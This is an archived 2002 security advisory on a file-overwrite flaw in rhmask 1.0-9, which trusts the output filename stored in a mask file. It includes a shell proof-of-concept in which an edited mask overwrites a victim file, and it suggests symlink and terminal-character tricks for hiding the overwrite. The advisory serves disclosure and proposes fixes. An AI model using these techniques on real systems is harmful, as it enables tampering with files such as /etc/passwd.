Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: lnx5431.htm

rhmask file overwrite



13th Jun 2002 [SBWID-5431]
COMMAND

	rhmask file overwrite

SYSTEMS AFFECTED

	rhmask 1.0-9

PROBLEM

	Andrew Griffiths [http://www.tasmail.com] found following:
	

	rhmask is intended to allow the distribution of files as  masks  against
	other files. This lets new versions of software  be  freely  distributed
	on public internet servers but limits  their  usefulness  to  those  who
	already have a copy of the package. It uses a simple XOR  scheme  for  creating
	the file mask and uses file size and md5 sums to  ensure  the  integrity
	of the result.
	

	

	 Problem

	 =======

	

	rhmask will blindly trust the output filename in the mask given  to  it.
	This allows, for example, overwriting of  /etc/passwd  (or  creatation).
	(Subject to the priviledges that ran rhmask , of course).
	

	

	 Notes

	 =====

	

	Files created will be created with 0666 (subject to your  umask).  If  a
	person has a umask of 0, files will  be  readable  +  writable  by  all.
	(duh)
	

	rhmask takes different filesizes.
	

	

	 Demonstration

	 =============

	

	

	[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >old_file

	> this is the old version

	> _EOF_

	[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >new_file

	> this is the new version

	> _EOF_

	[andrewg@blackhole rhmask_test]$ cat <<_EOF_ >victim

	> I\'m a helpless victim file

	> _EOF_

	[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file

	replace_old_file.mask

	[andrewg@blackhole rhmask_test]$ rm -f new_file

	[andrewg@blackhole rhmask_test]$ rhmask old_file

	replace_old_file.mask

	generating new_file

	[andrewg@blackhole rhmask_test]$ cat new_file

	this is the new version

	[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask

	7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2new_file

	[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask

	

	[ ht is a binary editor for linux ]

	

	[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask

	7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2victim

	[andrewg@blackhole rhmask_test]$ rhmask old_file

	replace_old_file.mask

	generating victim

	[andrewg@blackhole rhmask_test]$ cat victim

	this is the new version

	

	[ you killed kenny! ]

	

	[andrewg@blackhole rhmask_test]$ rhmask -d old_file new_file

	replace_old_file.mask

	[andrewg@blackhole rhmask_test]$ ht replace_old_file.mask

	[andrewg@blackhole rhmask_test]$ strings replace_old_file.mask

	7728359c40db617325aa6fc217714c7a6268f6888f1834f2d36ebc661fbbbea2/tmp/ile

	[andrewg@blackhole rhmask_test]$ rm -f /tmp/ile

	[andrewg@blackhole rhmask_test]$ rhmask old_file

	replace_old_file.mask

	generating /tmp/ile

	[andrewg@blackhole rhmask_test]$ cat /tmp/ile

	this is the new version

	

	

	

	 Severity

	 ========

	

	Well, this part being the most subjective, I would say its  rather  low,
	as it tells you the file name as it does  it.  However,  since  it  also
	follows symlinks, you could probably make a /tmp symlink  with  terminal
	characaters in to overwrite the filename. Possibly along the lines of  a
	file  of  \'/tmp/symlink^Mgenerating  harmless\'  which  should   output
	\"generating harmless\" to appear...  however,  when  harmless  doesn\'t
	appear or hasn\'t changed their will  be  most  likely  suspicion.  file
	also has the same problem with terminal charaters in the data  it  reads
	and outputs.
	

	

SOLUTION

	Firstly, have it ignore or complain about slashes in the filename.  Have
	it prompt you if the target filename is a symbolic link.
	

	[ In my oponion, sign  the  maskfile  &  make  sure  you  check  the
	signature before  using  it.  Oh,  and  don\'t  obtain  the  maskfile  +
	signature + public key of the person from the same place. ]
	

	Besides, the author (Erik  Troan,  ewt@redhat.com)  was  informed  about
	this a couple of months ago, and he told me  this  was  a  non-issue  as
	RedHat where moving to a different system.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH